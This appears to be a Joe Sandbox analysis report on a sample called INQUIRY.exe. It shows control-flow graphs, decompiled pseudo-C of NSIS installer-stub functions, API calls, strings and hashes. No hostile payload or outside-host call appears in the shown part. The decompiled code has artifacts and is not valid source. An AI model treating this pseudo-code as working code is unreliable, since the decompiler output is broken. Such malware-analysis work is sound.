                          • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                          • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 121 403659-403678 call 403897 call 405659 111->121 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->121 126 40367e-403683 121->126 127 4036ff-403707 call 405659 121->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 139 4036be-4036ca lstrlenA 135->139 140 4036af-4036bc call 4055a3 135->140 141 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->141 142 40388d 137->142 151 4037d3-4037d6 138->151 152 4037db-4037e6 call 403897 138->152 146 4036f2-4036fa call 405578 call 405a85 139->146 147 4036cc-4036da lstrcmpiA 139->147 140->139 141->138 144 40388f-403896 142->144 146->127 147->146 150 4036dc-4036e6 GetFileAttributesA 147->150 155 4036e8-4036ea 150->155 156 4036ec-4036ed call 4055bf 150->156 151->144 161 403864-40386c call 404ef5 152->161 162 4037e8-403805 ShowWindow LoadLibraryA 152->162 155->146 155->156 156->146 170 403886-403888 call 40140b 161->170 171 40386e-403874 161->171 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->144 170->142 171->151 174 40387a-403881 call 40140b 171->174 174->151
                          C-Code - Quality: 96%
                          			E004035E3() {
                          				intOrPtr _v4;
                          				intOrPtr _v8;
                          				int _v12;
                          				int _v16;
                          				char _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t20;
                          				signed int _t24;
                          				void* _t28;
                          				void* _t30;
                          				int _t31;
                          				void* _t34;
                          				struct HINSTANCE__* _t37;
                          				int _t38;
                          				intOrPtr _t39;
                          				int _t42;
                          				intOrPtr _t59;
                          				char _t61;
                          				CHAR* _t63;
                          				signed char _t67;
                          				struct HINSTANCE__* _t75;
                          				CHAR* _t78;
                          				intOrPtr _t80;
                          				CHAR* _t85;
                          
                          				_t80 =  *0x423eb0; // 0x51d818
                          				_t20 = E00405DA3(6);
                          				_t87 = _t20;
                          				if(_t20 == 0) {
                          					_t78 = 0x420498;
                          					"1033" = 0x7830;
                          					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                          					__eflags =  *0x420498;
                          					if(__eflags == 0) {
                          						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                          					}
                          					lstrcatA("1033", _t78);
                          				} else {
                          					E004059E3("1033",  *_t20() & 0x0000ffff);
                          				}
                          				E00403897(_t75, _t87);
                          				_t24 =  *0x423eb8; // 0x80
                          				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                          				 *0x423f20 = _t24 & 0x00000020;
                          				if(E00405659(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                          					L16:
                          					if(E00405659(_t95, _t84) == 0) {
                          						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                          					}
                          					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                          					 *0x423688 = _t28;
                          					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                          						L21:
                          						if(E0040140B(0) == 0) {
                          							_t30 = E00403897(_t75, __eflags);
                          							__eflags =  *0x423f40; // 0x0
                          							if(__eflags != 0) {
                          								_t31 = E00404EF5(_t30, 0);
                          								__eflags = _t31;
                          								if(_t31 == 0) {
                          									E0040140B(1);
                          									goto L33;
                          								}
                          								__eflags =  *0x42366c; // 0x0
                          								if(__eflags == 0) {
                          									E0040140B(2);
                          								}
                          								goto L22;
                          							}
                          							ShowWindow( *0x420470, 5);
                          							_t37 = LoadLibraryA("RichEd20");
                          							__eflags = _t37;
                          							if(_t37 == 0) {
                          								LoadLibraryA("RichEd32");
                          							}
                          							_t85 = "RichEdit20A";
                          							_t38 = GetClassInfoA(0, _t85, 0x423640);
                          							__eflags = _t38;
                          							if(_t38 == 0) {
                          								GetClassInfoA(0, "RichEdit", 0x423640);
                          								 *0x423664 = _t85;
                          								RegisterClassA(0x423640);
                          							}
                          							_t39 =  *0x423680; // 0x0
                          							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
                          							E0040140B(5);
                          							return _t42;
                          						}
                          						L22:
                          						_t34 = 2;
                          						return _t34;
                          					} else {
                          						_t75 =  *0x423ea0; // 0x400000
                          						 *0x423654 = _t28;
                          						_v20 = 0x624e5f;
                          						 *0x423644 = E00401000;
                          						 *0x423650 = _t75;
                          						 *0x423664 =  &_v20;
                          						if(RegisterClassA(0x423640) == 0) {
                          							L33:
                          							__eflags = 0;
                          							return 0;
                          						}
                          						_t12 =  &_v16; // 0x624e5f
                          						SystemParametersInfoA(0x30, 0, _t12, 0);
                          						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                          						goto L21;
                          					}
                          				} else {
                          					_t75 =  *(_t80 + 0x48);
                          					if(_t75 == 0) {
                          						goto L16;
                          					}
                          					_t59 =  *0x423ed8; // 0x521d84
                          					_t78 = 0x422e40;
                          					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
                          					_t61 =  *0x422e40; // 0x78
                          					if(_t61 == 0) {
                          						goto L16;
                          					}
                          					if(_t61 == 0x22) {
                          						_t78 = 0x422e41;
                          						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                          					}
                          					_t63 = lstrlenA(_t78) + _t78 - 4;
                          					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                          						L15:
                          						E00405A85(_t84, E00405578(_t78));
                          						goto L16;
                          					} else {
                          						_t67 = GetFileAttributesA(_t78);
                          						if(_t67 == 0xffffffff) {
                          							L14:
                          							E004055BF(_t78);
                          							goto L15;
                          						}
                          						_t95 = _t67 & 0x00000010;
                          						if((_t67 & 0x00000010) != 0) {
                          							goto L15;
                          						}
                          						goto L14;
                          					}
                          				}
                          			}





























                          0x004035e9
                          0x004035f2
                          0x004035f9
                          0x004035fb
                          0x0040360f
                          0x00403621
                          0x0040362b
                          0x00403630
                          0x00403636
                          0x00403649
                          0x00403649
                          0x00403654
                          0x004035fd
                          0x00403608
                          0x00403608
                          0x00403659
                          0x0040365e
                          0x00403663
                          0x0040366c
                          0x00403678
                          0x004036ff
                          0x00403707
                          0x00403710
                          0x00403710
                          0x00403726
                          0x0040372c
                          0x0040373a
                          0x004037c9
                          0x004037d1
                          0x004037db
                          0x004037e0
                          0x004037e6
                          0x00403865
                          0x0040386a
                          0x0040386c
                          0x00403888
                          0x00000000
                          0x00403888
                          0x0040386e
                          0x00403874
                          0x0040387c
                          0x0040387c
                          0x00000000
                          0x00403874
                          0x004037f0
                          0x00403801
                          0x00403803
                          0x00403805
                          0x0040380c
                          0x0040380c
                          0x00403814
                          0x0040381c
                          0x0040381e
                          0x00403820
                          0x00403829
                          0x0040382c
                          0x00403832
                          0x00403832
                          0x00403838
                          0x00403851
                          0x0040385b
                          0x00000000
                          0x00403860
                          0x004037d3
                          0x004037d5
                          0x00000000
                          0x00403740
                          0x00403740
                          0x00403746
                          0x00403750
                          0x00403758
                          0x00403762
                          0x00403768
                          0x00403776
                          0x0040388d
                          0x0040388d
                          0x00000000
                          0x0040388d
                          0x0040377c
                          0x00403785
                          0x004037c4
                          0x00000000
                          0x004037c4
                          0x0040367e
                          0x0040367e
                          0x00403683
                          0x00000000
                          0x00000000
                          0x00403688
                          0x0040368d
                          0x0040369d
                          0x004036a2
                          0x004036a9
                          0x00000000
                          0x00000000
                          0x004036ad
                          0x004036af
                          0x004036bc
                          0x004036bc
                          0x004036c4
                          0x004036ca
                          0x004036f2
                          0x004036fa
                          0x00000000
                          0x004036dc
                          0x004036dd
                          0x004036e6
                          0x004036ec
                          0x004036ed
                          0x00000000
                          0x004036ed
                          0x004036e8
                          0x004036ea
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004036ea
                          0x004036ca

                          APIs
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                          • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\INQUIRY.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                          • lstrlenA.KERNEL32(xzfdi,?,?,?,xzfdi,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\INQUIRY.exe" ), ref: 004036BF
                          • lstrcmpiA.KERNEL32(?,.exe,xzfdi,?,?,?,xzfdi,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                          • GetFileAttributesA.KERNEL32(xzfdi), ref: 004036DD
                          • LoadImageA.USER32 ref: 00403726
                            • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                          • RegisterClassA.USER32 ref: 0040376D
                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                          • CreateWindowExA.USER32 ref: 004037BE
                          • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                          • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                          • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                          • GetClassInfoA.USER32 ref: 0040381C
                          • GetClassInfoA.USER32 ref: 00403829
                          • RegisterClassA.USER32 ref: 00403832
                          • DialogBoxParamA.USER32 ref: 00403851
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\Desktop\INQUIRY.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$xzfdi
                          • API String ID: 914957316-518817336
                          • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                          • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                          • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                          • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 196 402eb2-402eb7 189->196 197 402de7-402dea 189->197 192 402d02 190->192 193 402d04-402d0a call 4031a8 190->193 192->193 198 402d0f-402d11 193->198 196->182 199 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 197->199 200 402dec-402dfd call 4031da call 4031a8 197->200 201 402d17-402d1d 198->201 202 402e6e-402e76 call 402bc5 198->202 226 402e64-402e69 199->226 227 402e78-402ea8 call 4031da call 402f01 199->227 223 402e02-402e04 200->223 206 402d9d-402da1 201->206 207 402d1f-402d37 call 40571d 201->207 202->196 210 402da3-402da9 call 402bc5 206->210 211 402daa-402db0 206->211 207->211 222 402d39-402d40 207->222 210->211 218 402db2-402dc0 call 405e0f 211->218 219 402dc3-402dcd 211->219 218->219 219->189 219->190 222->211 228 402d42-402d49 222->228 223->196 229 402e0a-402e10 223->229 226->182 237 402ead-402eb0 227->237 228->211 230 402d4b-402d52 228->230 229->196 229->199 230->211 232 402d54-402d5b 230->232 232->211 234 402d5d-402d7d 232->234 234->196 236 402d83-402d87 234->236 238 402d89-402d8d 236->238 239 402d8f-402d97 236->239 237->196 240 402eb9-402eca 237->240 238->189 238->239 239->211 241 402d99-402d9b 239->241 242 402ed2-402ed7 240->242 243 402ecc 240->243 241->211 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                          C-Code - Quality: 96%
                          			E00402C5B(void* __eflags, signed int _a4) {
                          				long _v8;
                          				long _v12;
                          				intOrPtr _v16;
                          				long _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				signed int _v40;
                          				char _v300;
                          				signed int _t54;
                          				void* _t57;
                          				void* _t62;
                          				signed int _t63;
                          				intOrPtr _t65;
                          				void* _t68;
                          				intOrPtr* _t70;
                          				intOrPtr _t71;
                          				signed int _t77;
                          				signed int _t79;
                          				signed int _t82;
                          				signed int _t83;
                          				signed int _t89;
                          				intOrPtr _t92;
                          				signed int _t101;
                          				signed int _t103;
                          				void* _t105;
                          				signed int _t106;
                          				signed int _t109;
                          				void* _t110;
                          
                          				_v8 = 0;
                          				_v12 = 0;
                          				 *0x423eac = GetTickCount() + 0x3e8;
                          				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\INQUIRY.exe", 0x400);
                          				_t105 = E0040575C("C:\\Users\\jones\\Desktop\\INQUIRY.exe", 0x80000000, 3);
                          				 *0x409010 = _t105;
                          				if(_t105 == 0xffffffff) {
                          					return "Error launching installer";
                          				}
                          				E00405A85("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\INQUIRY.exe");
                          				E00405A85(0x42b000, E004055BF("C:\\Users\\jones\\Desktop"));
                          				_t54 = GetFileSize(_t105, 0);
                          				__eflags = _t54;
                          				 *0x41f048 = _t54;
                          				_t109 = _t54;
                          				if(_t54 <= 0) {
                          					L22:
                          					E00402BC5(1);
                          					__eflags =  *0x423eb4; // 0xb600
                          					if(__eflags == 0) {
                          						goto L30;
                          					}
                          					__eflags = _v12;
                          					if(_v12 == 0) {
                          						L26:
                          						_t57 = GlobalAlloc(0x40, _v20); // executed
                          						_t110 = _t57;
                          						E00405E7D(0x40afb0);
                          						E0040578B( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                          						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                          						__eflags = _t62 - 0xffffffff;
                          						 *0x409014 = _t62;
                          						if(_t62 != 0xffffffff) {
                          							_t63 =  *0x423eb4; // 0xb600
                          							_t65 = E004031DA(_t63 + 0x1c);
                          							 *0x41f04c = _t65;
                          							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                          							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                          							__eflags = _t68 - _v20;
                          							if(_t68 == _v20) {
                          								__eflags = _v40 & 0x00000001;
                          								 *0x423eb0 = _t110;
                          								 *0x423eb8 =  *_t110;
                          								if((_v40 & 0x00000001) != 0) {
                          									 *0x423ebc =  *0x423ebc + 1;
                          									__eflags =  *0x423ebc;
                          								}
                          								_t45 = _t110 + 0x44; // 0x44
                          								_t70 = _t45;
                          								_t101 = 8;
                          								do {
                          									_t70 = _t70 - 8;
                          									 *_t70 =  *_t70 + _t110;
                          									_t101 = _t101 - 1;
                          									__eflags = _t101;
                          								} while (_t101 != 0);
                          								_t71 =  *0x41703c; // 0x50207
                          								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                          								E0040571D(0x423ec0, _t110 + 4, 0x40);
                          								__eflags = 0;
                          								return 0;
                          							}
                          							goto L30;
                          						}
                          						return "Error writing temporary file. Make sure your temp folder is valid.";
                          					}
                          					E004031DA( *0x417038);
                          					_t77 = E004031A8( &_a4, 4); // executed
                          					__eflags = _t77;
                          					if(_t77 == 0) {
                          						goto L30;
                          					}
                          					__eflags = _v8 - _a4;
                          					if(_v8 != _a4) {
                          						goto L30;
                          					}
                          					goto L26;
                          				} else {
                          					do {
                          						_t79 =  *0x423eb4; // 0xb600
                          						_t106 = _t109;
                          						asm("sbb eax, eax");
                          						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
                          						__eflags = _t109 - _t82;
                          						if(_t109 >= _t82) {
                          							_t106 = _t82;
                          						}
                          						_t83 = E004031A8(0x417048, _t106); // executed
                          						__eflags = _t83;
                          						if(_t83 == 0) {
                          							E00402BC5(1);
                          							L30:
                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                          						}
                          						__eflags =  *0x423eb4; // 0xb600
                          						if(__eflags != 0) {
                          							__eflags = _a4 & 0x00000002;
                          							if((_a4 & 0x00000002) == 0) {
                          								E00402BC5(0);
                          							}
                          							goto L19;
                          						}
                          						E0040571D( &_v40, 0x417048, 0x1c);
                          						_t89 = _v40;
                          						__eflags = _t89 & 0xfffffff0;
                          						if((_t89 & 0xfffffff0) != 0) {
                          							goto L19;
                          						}
                          						__eflags = _v36 - 0xdeadbeef;
                          						if(_v36 != 0xdeadbeef) {
                          							goto L19;
                          						}
                          						__eflags = _v24 - 0x74736e49;
                          						if(_v24 != 0x74736e49) {
                          							goto L19;
                          						}
                          						__eflags = _v28 - 0x74666f73;
                          						if(_v28 != 0x74666f73) {
                          							goto L19;
                          						}
                          						__eflags = _v32 - 0x6c6c754e;
                          						if(_v32 != 0x6c6c754e) {
                          							goto L19;
                          						}
                          						_a4 = _a4 | _t89;
                          						_t103 =  *0x417038; // 0x0
                          						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                          						_t92 = _v16;
                          						__eflags = _t92 - _t109;
                          						 *0x423eb4 = _t103;
                          						if(_t92 > _t109) {
                          							goto L30;
                          						}
                          						__eflags = _a4 & 0x00000008;
                          						if((_a4 & 0x00000008) != 0) {
                          							L15:
                          							_v12 = _v12 + 1;
                          							_t109 = _t92 - 4;
                          							__eflags = _t106 - _t109;
                          							if(_t106 > _t109) {
                          								_t106 = _t109;
                          							}
                          							goto L19;
                          						}
                          						__eflags = _a4 & 0x00000004;
                          						if((_a4 & 0x00000004) != 0) {
                          							goto L22;
                          						}
                          						goto L15;
                          						L19:
                          						__eflags = _t109 -  *0x41f048; // 0x32d2
                          						if(__eflags < 0) {
                          							_v8 = E00405E0F(_v8, 0x417048, _t106);
                          						}
                          						 *0x417038 =  *0x417038 + _t106;
                          						_t109 = _t109 - _t106;
                          						__eflags = _t109;
                          					} while (_t109 > 0);
                          					goto L22;
                          				}
                          			}

































                          0x00402c69
                          0x00402c6c
                          0x00402c86
                          0x00402c8b
                          0x00402c9e
                          0x00402ca3
                          0x00402ca9
                          0x00000000
                          0x00402cab
                          0x00402cbc
                          0x00402ccd
                          0x00402cd4
                          0x00402cda
                          0x00402cdc
                          0x00402ce1
                          0x00402ce3
                          0x00402dd3
                          0x00402dd5
                          0x00402dda
                          0x00402de1
                          0x00000000
                          0x00000000
                          0x00402de7
                          0x00402dea
                          0x00402e16
                          0x00402e1b
                          0x00402e26
                          0x00402e28
                          0x00402e39
                          0x00402e54
                          0x00402e5a
                          0x00402e5d
                          0x00402e62
                          0x00402e78
                          0x00402e81
                          0x00402e91
                          0x00402ea3
                          0x00402ea8
                          0x00402ead
                          0x00402eb0
                          0x00402eb9
                          0x00402ebd
                          0x00402ec5
                          0x00402eca
                          0x00402ecc
                          0x00402ecc
                          0x00402ecc
                          0x00402ed4
                          0x00402ed4
                          0x00402ed7
                          0x00402ed8
                          0x00402ed8
                          0x00402edb
                          0x00402edd
                          0x00402edd
                          0x00402edd
                          0x00402ee0
                          0x00402ee7
                          0x00402ef3
                          0x00402ef8
                          0x00000000
                          0x00402ef8
                          0x00000000
                          0x00402eb0
                          0x00000000
                          0x00402e64
                          0x00402df2
                          0x00402dfd
                          0x00402e02
                          0x00402e04
                          0x00000000
                          0x00000000
                          0x00402e0d
                          0x00402e10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402ce9
                          0x00402ce9
                          0x00402ce9
                          0x00402cee
                          0x00402cf2
                          0x00402cf9
                          0x00402cfe
                          0x00402d00
                          0x00402d02
                          0x00402d02
                          0x00402d0a
                          0x00402d0f
                          0x00402d11
                          0x00402e70
                          0x00402eb2
                          0x00000000
                          0x00402eb2
                          0x00402d17
                          0x00402d1d
                          0x00402d9d
                          0x00402da1
                          0x00402da4
                          0x00402da9
                          0x00000000
                          0x00402da1
                          0x00402d2a
                          0x00402d2f
                          0x00402d32
                          0x00402d37
                          0x00000000
                          0x00000000
                          0x00402d39
                          0x00402d40
                          0x00000000
                          0x00000000
                          0x00402d42
                          0x00402d49
                          0x00000000
                          0x00000000
                          0x00402d4b
                          0x00402d52
                          0x00000000
                          0x00000000
                          0x00402d54
                          0x00402d5b
                          0x00000000
                          0x00000000
                          0x00402d5d
                          0x00402d63
                          0x00402d6c
                          0x00402d72
                          0x00402d75
                          0x00402d77
                          0x00402d7d
                          0x00000000
                          0x00000000
                          0x00402d83
                          0x00402d87
                          0x00402d8f
                          0x00402d8f
                          0x00402d92
                          0x00402d95
                          0x00402d97
                          0x00402d99
                          0x00402d99
                          0x00000000
                          0x00402d97
                          0x00402d89
                          0x00402d8d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402daa
                          0x00402daa
                          0x00402db0
                          0x00402dc0
                          0x00402dc0
                          0x00402dc3
                          0x00402dc9
                          0x00402dcb
                          0x00402dcb
                          0x00000000
                          0x00402ce9

                          APIs
                          • GetTickCount.KERNEL32 ref: 00402C6F
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\INQUIRY.exe,00000400), ref: 00402C8B
                            • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 00405760
                            • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INQUIRY.exe,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 00402CD4
                          • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                          Strings
                          • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                          • soft, xrefs: 00402D4B
                          • "C:\Users\user\Desktop\INQUIRY.exe" , xrefs: 00402C68
                          • Inst, xrefs: 00402D42
                          • Null, xrefs: 00402D54
                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                          • Error launching installer, xrefs: 00402CAB
                          • C:\Users\user\Desktop\INQUIRY.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\INQUIRY.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\INQUIRY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                          • API String ID: 2803837635-927838801
                          • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                          • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                          • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                          • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 329 401778-40177e call 405ce3 322->329 323->329 333 401783-401787 329->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 343 4017a5-4017b7 334->343 344 401795-4017a3 CompareFileTime 334->344 337 4017c5-4017e1 call 40575c 335->337 338 4017bf-4017c0 call 40573d 335->338 345 4017e3-4017e6 337->345 346 401859-401882 call 404e23 call 402f01 337->346 338->337 343->335 344->343 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 360 401884-401888 346->360 361 40188a-401896 SetFileTime 346->361 347->333 380 401830-401831 347->380 358 40184e-401854 348->358 362 402886 358->362 360->361 364 40189c-4018a7 FindCloseChangeNotification 360->364 361->364 366 402888-40288c 362->366 367 40287d-402880 364->367 368 4018ad-4018b0 364->368 367->362 370 4018b2-4018c3 call 405aa7 lstrcatA 368->370 371 4018c5-4018c8 call 405aa7 368->371 376 4018cd-402205 call 405346 370->376 371->376 376->366 384 40264e-402655 376->384 380->358 383 401833-401834 380->383 383->348 384->367
                          C-Code - Quality: 75%
                          			E00401734(FILETIME* __ebx, void* __eflags) {
                          				void* _t33;
                          				void* _t41;
                          				void* _t43;
                          				FILETIME* _t49;
                          				FILETIME* _t62;
                          				void* _t64;
                          				signed int _t70;
                          				FILETIME* _t71;
                          				FILETIME* _t75;
                          				signed int _t77;
                          				void* _t80;
                          				CHAR* _t82;
                          				void* _t85;
                          
                          				_t75 = __ebx;
                          				_t82 = E004029E8(0x31);
                          				 *(_t85 - 8) = _t82;
                          				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                          				_t33 = E004055E5(_t82);
                          				_push(_t82);
                          				if(_t33 == 0) {
                          					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                          				} else {
                          					_push(0x409b68);
                          					E00405A85();
                          				}
                          				E00405CE3(0x409b68);
                          				while(1) {
                          					__eflags =  *(_t85 + 8) - 3;
                          					if( *(_t85 + 8) >= 3) {
                          						_t64 = E00405D7C(0x409b68);
                          						_t77 = 0;
                          						__eflags = _t64 - _t75;
                          						if(_t64 != _t75) {
                          							_t71 = _t64 + 0x14;
                          							__eflags = _t71;
                          							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                          						}
                          						asm("sbb eax, eax");
                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                          						__eflags = _t70;
                          						 *(_t85 + 8) = _t70;
                          					}
                          					__eflags =  *(_t85 + 8) - _t75;
                          					if( *(_t85 + 8) == _t75) {
                          						E0040573D(0x409b68);
                          					}
                          					__eflags =  *(_t85 + 8) - 1;
